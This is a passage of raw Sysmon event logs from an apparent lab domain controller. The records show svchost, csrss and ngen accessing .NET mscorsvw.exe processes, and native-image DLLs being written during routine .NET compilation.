crosoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.725{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.709{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.709{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-9F04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:42.615{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11fc-0\System.WorkflowServices.dll2021-01-18 13:51:42.615 10341000x80000000000000008900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.740{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.725{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.725{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.615{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.600{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.600{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:43.537{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\db0-0\UIAutomationClient.dll2021-01-18 13:51:43.537 10341000x80000000000000008893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.303{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.303{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.225{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.225{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.225{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.084{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.084{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:43.037{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ecc-0\System.Xml.Serialization.dll2021-01-18 13:51:43.037 10341000x80000000000000008883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.006{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.990{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.990{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.912{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.896{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 